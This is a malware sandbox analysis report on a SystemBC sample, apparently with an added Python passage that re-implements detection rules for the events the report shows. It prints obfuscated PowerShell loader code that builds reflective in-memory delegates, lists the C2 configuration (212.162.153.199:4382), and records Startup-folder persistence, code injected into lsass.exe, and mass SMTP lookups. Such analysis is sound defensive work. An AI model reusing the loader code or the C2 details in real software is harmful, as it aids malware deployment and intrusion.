''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+[Char](73)+'n'+[Char](118)+
''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'af'+'e'+''+'N'+''+[Char](97
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\lsass.exe, ParentImage: C:\Windows\System32\lsass.exe, ParentProcessId: 640, ParentProcessName: lsass.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , ProcessId: 1848, ProcessName: wscript.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Local\Temp\$77a3a3b4", CommandLine: "C:\Users\user\AppData\Local\Temp\$77a3a3b4", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\$77a3a3b4, NewProcessName: C:\Users\user\AppData\Local\Temp\$77a3a3b4, OriginalFileName: C:\Users\user\AppData\Local\Temp\$77a3a3b4, ParentCommandLine: "C:\Users\user\Desktop\vm6XYZzWOd.exe", ParentImage: C:\Users\user\Desktop\vm6XYZzWOd.exe, ParentProcessId: 6772, ParentProcessName: vm6XYZzWOd.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\$77a3a3b4", ProcessId: 1100, ProcessName: $77a3a3b4
Source: Network Connection | Author: frack113 | Data: DestinationIp: 193.122.179.25, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\$778e373e, Initiated: true, ProcessId: 2944, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49716
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{a7581e3a-9da7-4299-b4e9-0d87c1c78a48}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 4304, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\lsass.exe, ParentImage: C:\Windows\System32\lsass.exe, ParentProcessId: 640, ParentProcessName: lsass.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs" , ProcessId: 1848, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UKPEWRGEIPej{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$diFffPduGehihq,[Parameter(Position=1)][Type]$PCksoXTjIn)$dnnozXtGtCr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+'o'+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'s'+'s'+''+','+'P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+'S'+'e'+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dnnozXtGtCr.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$diFffPduGehihq).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$dnnozXtGtCr.DefineMethod(''+
[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+'e','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$PCksoXTjIn,$diFffPduGehihq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $dnnozXtGtCr.CreateType();}$lVayyyANUYcKS=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+'af'+'e'+''+'N'+''+[Char](97
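The Sigma matches above arrive as flat key/value event data: wscript.exe launching a .vbs from the Startup folder with lsass.exe as its parent (PID 1848), an svchost.exe (PID 924) whose parent is dllhost.exe rather than services.exe, and the dropped $778e373e (PID 2944) opening TCP 587 to 193.122.179.25. The Python below is an added example, not part of the report and not the Sigma rules it cites: it re-implements simplified forms of those three checks, adds a fourth (lsass.exe spawning any child, which the process tree shows but no Sigma rule on this page names), and runs them over constructed Sysmon-style records whose values are taken from the report plus two benign controls I made up. The allowlists are my assumptions, not the Sigma rules' own lists.

```python
from pathlib import PureWindowsPath

# Constructed Sysmon-style events. The first three carry the values the report
# shows for PIDs 1848, 924 and 2944; the last two are benign controls I added.
EVENTS = [
    {"EventID": 1, "ProcessId": 1848, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs"',
     "ParentImage": r"C:\Windows\System32\lsass.exe", "ParentProcessId": 640},
    {"EventID": 1, "ProcessId": 924, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM",
     "ParentImage": r"C:\Windows\System32\dllhost.exe", "ParentProcessId": 4304},
    {"EventID": 3, "ProcessId": 2944, "Image": r"C:\Users\user\AppData\Local\Temp\$778e373e",
     "Protocol": "tcp", "Initiated": True,
     "DestinationIp": "193.122.179.25", "DestinationPort": 587},
    {"EventID": 1, "ProcessId": 1068, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",
     "ParentImage": r"C:\Windows\System32\services.exe", "ParentProcessId": 600},
    {"EventID": 3, "ProcessId": 5000, "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Protocol": "tcp", "Initiated": True,
     "DestinationIp": "40.99.0.1", "DestinationPort": 587},
]

SCRIPT_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf"}
SMTP_PORTS = {25, 465, 587, 2525}
# Assumed allowlists; the real Sigma rules carry their own, longer lists.
SVCHOST_PARENTS_OK = {"services.exe", "msmpeng.exe", "mrt.exe", "ngen.exe"}
MAIL_CLIENTS_OK = {"outlook.exe", "thunderbird.exe"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def wscript_startup_dropper(ev: dict) -> bool:
    """WScript/CScript executing a script that lives in a Startup folder."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in {"wscript.exe", "cscript.exe"}:
        return False
    cmd = ev["CommandLine"].lower()
    return "\\start menu\\programs\\startup\\" in cmd and any(ext in cmd for ext in SCRIPT_EXT)


def uncommon_svchost_parent(ev: dict) -> bool:
    """svchost.exe started by something other than the service control manager."""
    return (ev["EventID"] == 1 and basename(ev["Image"]) == "svchost.exe"
            and basename(ev["ParentImage"]) not in SVCHOST_PARENTS_OK)


def suspicious_outbound_smtp(ev: dict) -> bool:
    """Initiated TCP connection to an SMTP port from a non-mail-client image."""
    return (ev["EventID"] == 3 and ev["Initiated"] and ev["Protocol"] == "tcp"
            and ev["DestinationPort"] in SMTP_PORTS
            and basename(ev["Image"]) not in MAIL_CLIENTS_OK)


def lsass_spawned_child(ev: dict) -> bool:
    """lsass.exe does not legitimately spawn children; a child means injected code."""
    return ev["EventID"] == 1 and basename(ev["ParentImage"]) == "lsass.exe"


RULES = [wscript_startup_dropper, uncommon_svchost_parent,
         suspicious_outbound_smtp, lsass_spawned_child]


def run_rules(events: list) -> list:
    """Return (rule_name, ProcessId) for every rule that fires on every event."""
    return [(rule.__name__, ev["ProcessId"])
            for ev in events for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for name, pid in run_rules(EVENTS):
        print(f"{name}: PID {pid}")
```

The lsass.exe check is the one that pays off here: the Startup-folder dropper would fire on a noisy but legitimate logon script, whereas a child under lsass.exe has no benign explanation and ties the wscript.exe launch directly to the "Injects code into a foreign process" signatures above.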

                      Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\vm6XYZzWOd.exe, ProcessId: 6772, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs
                      No Snort rule has matched


                      AV Detection

                      Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
                      Source: 0.2.vm6XYZzWOd.exe.3c166a4.0.raw.unpack Malware Configuration Extractor: SystemBC {"NDATAHOST1": "212.162.153.199", "HOST2": "212.162.153.199", "PORT1": "4382"}
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e ReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 ReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Temp\$77eec42d ReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Roaming\$77Kaxhwswfup.exe ReversingLabs: Detection: 47%
                      Source: vm6XYZzWOd.exe ReversingLabs: Detection: 47%
                      Source: vm6XYZzWOd.exe Virustotal: Detection: 37%
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Code function: 3_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_00401000
                      Source: vm6XYZzWOd.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: vm6XYZzWOd.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000011.00000000.2381194238.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3566674758.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000011.00000000.2381194238.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3566674758.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: vm6XYZzWOd.exe, 00000000.00000002.2336961544.0000000007780000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006BAD000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2765221836.0000000004770000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003890000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: vm6XYZzWOd.exe, 00000000.00000002.2314321944.000000000699F000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2314321944.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2336449142.0000000007630000.00000004.08000000.00040000.00000000.sdmp, vm6XYZzWOd.exe, 00000000.00000002.2300253783.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C9D000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2746243713.0000000003728000.00000004.00000800.00020000.00000000.sdmp, $77Kaxhwswfup.exe, 00000015.00000002.2778996025.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ~1.PDB @ source: svchost.exe, 00000011.00000002.3566674758.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381194238.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.3565608470.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.2381021025.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000011.00000000.2381279462.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3568440069.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Users\user\AppData\Local\Temp\$77a3a3b4 Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Users\user\AppData\Local\Temp\$778e373e Code function: 6_2_00FDB19B FindFirstFileExW,6_2_00FDB19B
                      Source: C:\Windows\System32\dllhost.exe Code function: 7_2_000001B094E9E09C FindFirstFileExW,7_2_000001B094E9E09C
                      Source: C:\Windows\System32\winlogon.exe Code function: 8_2_000001E85898E09C FindFirstFileExW,8_2_000001E85898E09C
                      Source: C:\Windows\System32\lsass.exe Code function: 9_2_00000140AE86E09C FindFirstFileExW,9_2_00000140AE86E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 10_2_00000195DD5CE09C FindFirstFileExW,10_2_00000195DD5CE09C
                      Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000257E10AE09C FindFirstFileExW,12_2_00000257E10AE09C
                      Source: C:\Windows\System32\svchost.exe Code function: 13_2_000001F28C93E09C FindFirstFileExW,13_2_000001F28C93E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 14_2_000001CA9854E09C FindFirstFileExW,14_2_000001CA9854E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001D26531E09C FindFirstFileExW,15_2_000001D26531E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000254A2D4E09C FindFirstFileExW,16_2_00000254A2D4E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 17_2_0000024B87DDE09C FindFirstFileExW,17_2_0000024B87DDE09C
                      Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000205FD40E09C FindFirstFileExW,18_2_00000205FD40E09C
                      Source: C:\Windows\System32\svchost.exe Code function: 19_2_000001A2056AE09C FindFirstFileExW,19_2_000001A2056AE09C

                      Networking

                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ghuitf.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bbox.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.netregistry.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hereiam.plus.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.secureserver.net
                      Source: C:\Windows\System32\svchost.exeDomain query: alt4.aspmx.l.google.com
                      Source: C:\Windows\System32\svchost.exeDomain query: alc.io
                      Source: C:\Windows\System32\svchost.exeDomain query: cometa21.it
                      Source: C:\Windows\System32\svchost.exeDomain query: eddwebs.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cogeco.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.iprimus.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.strath.ac.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virginmedia.com
                      Source: C:\Windows\System32\svchost.exeDomain query: peterboroughcab-org-uk.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.acicapital.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.grandwayne.com
                      Source: C:\Windows\System32\svchost.exeDomain query: teletu.it
                      Source: C:\Windows\System32\svchost.exeDomain query: tinyworld.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centrum.sk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.caistergolf.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.skynet.be
                      Source: C:\Windows\System32\svchost.exeDomain query: nrl.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.kabsi.at
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.optimum.net
                      Source: C:\Windows\System32\svchost.exeDomain query: out.aumentarpenis.net
                      Source: C:\Windows\System32\svchost.exeDomain query: cilm.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.sohns-ruit.de
